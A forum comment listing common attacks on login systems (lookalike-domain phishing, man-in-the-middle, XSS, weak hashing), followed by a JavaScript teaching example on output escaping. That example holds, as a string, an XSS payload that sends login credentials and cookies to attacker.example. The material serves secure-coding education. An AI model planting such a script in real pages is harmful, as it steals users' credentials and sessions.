by Cyberdog 2293 days ago
Spoofing. I start up faceb0ok.website or whatever and theme it to look identical to Facebook. I then make a viral Facebook post that tells you Facebook will send you a $50 Amazon gift card if you click on this link. You click, then instinctively log in with your Facebook credentials because you can't tell that you're not on the real Facebook anymore. I now have your credentials.

Man-in-the-Middle (MITM). I'm at the same coffee shop as you and I've taken control of the router. You request your bank's web site and I'm able to route that request through my laptop, fetch the web page, and return it back to you. You log in to the web site. The connection is still encrypted, but the termination of the encryption is actually happening on my laptop. You log into the bank site. I now have your bank account credentials.

Cross-site scripting (XSS). Your site allows visitors to embed content (for example, message board posts) without that content being properly filtered. I use that to embed some JavaScript that watches for users using the login form on your site and sends those credentials to me, or sends the contents of the cookies of users already logged on.

Poor hashing. You mentioned that above so you're probably aware of it already, but it's disturbing and surprising how many sites don't have this figured out yet.

I'm not sure what problems network dropouts could cause, at least in terms of security - which is the big problem here.

Of course there's more, but this is what comes to mind. In summary, I strongly suggest you don't try to reinvent a new authentication system. Use one already in common use. It's probably already fairly battle-tested and validated for correctness and security. This goes for most other types of software as well.
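The XSS scenario in the comment above (a message board that renders posts unfiltered, and an injected script that hooks the login form and ships credentials plus cookies off-site), written out as an added example. This is not code from the comment or from any real site; the escape function, the page template, the form field names, the `attacker.example` URL and both sample posts are constructed for the illustration. The attacker payload is only ever handled as a string here, never executed.

```javascript
// Added example: a message-board page rendered with and without output
// escaping, and the constructed attacker post that the unescaped version
// would turn into a credential- and cookie-stealing script.

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed attacker post. If rendered raw it hooks the login form's submit
// event and beacons the username, password and document.cookie to the attacker.
const ATTACKER_POST = [
  '<script>',
  'document.querySelector("form#login").addEventListener("submit", (e) => {',
  '  const f = new FormData(e.target);',
  '  navigator.sendBeacon("https://attacker.example/c", JSON.stringify({',
  '    u: f.get("username"), p: f.get("password"), cookie: document.cookie',
  '  }));',
  '});',
  '</script>',
].join('\n');

// Constructed benign post that still contains a character worth escaping.
const BENIGN_POST = 'Anyone else having 2FA trouble? <3 the new UI though';

// Page template (constructed). It contains the login form and the post list,
// and deliberately no <script> element of its own.
function pageShell(postsHtml) {
  return [
    '<form id="login" method="post" action="/login">',
    '  <input name="username"><input name="password" type="password">',
    '</form>',
    '<ul class="posts">', postsHtml, '</ul>',
  ].join('\n');
}

// Vulnerable: interpolates post bodies straight into the markup.
function renderUnsafe(posts) {
  return pageShell(posts.map((p) => `<li>${p}</li>`).join('\n'));
}

// Hardened: every post body passes through escapeHtml before interpolation,
// so the attacker's <script> tag becomes inert text on the page.
function renderSafe(posts) {
  return pageShell(posts.map((p) => `<li>${escapeHtml(p)}</li>`).join('\n'));
}

// The template has no script element, so any "<script" in the output is
// injected content. Useful as a cheap regression check on rendered pages.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Defence in depth for the cookie-theft half of the attack: a session cookie
// marked HttpOnly is not visible to document.cookie, so even a successful
// injection cannot read it (it can still act with the session while the
// page is open, which is why escaping, not the flag, is the real fix).
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Stand-alone demonstration.
const demoPosts = [BENIGN_POST, ATTACKER_POST];
console.log('unsafe render contains injected script:', containsInjectedScript(renderUnsafe(demoPosts)));
console.log('safe render contains injected script:  ', containsInjectedScript(renderSafe(demoPosts)));
console.log('Set-Cookie:', sessionCookieHeader('abc 123'));
```

Escaping on output is the fix the comment is pointing at; filtering on input is a weaker substitute because the same post may later be rendered in a context (attribute, JavaScript string, URL) where the HTML text-node escaping above is not sufficient, so each sink needs its own encoder.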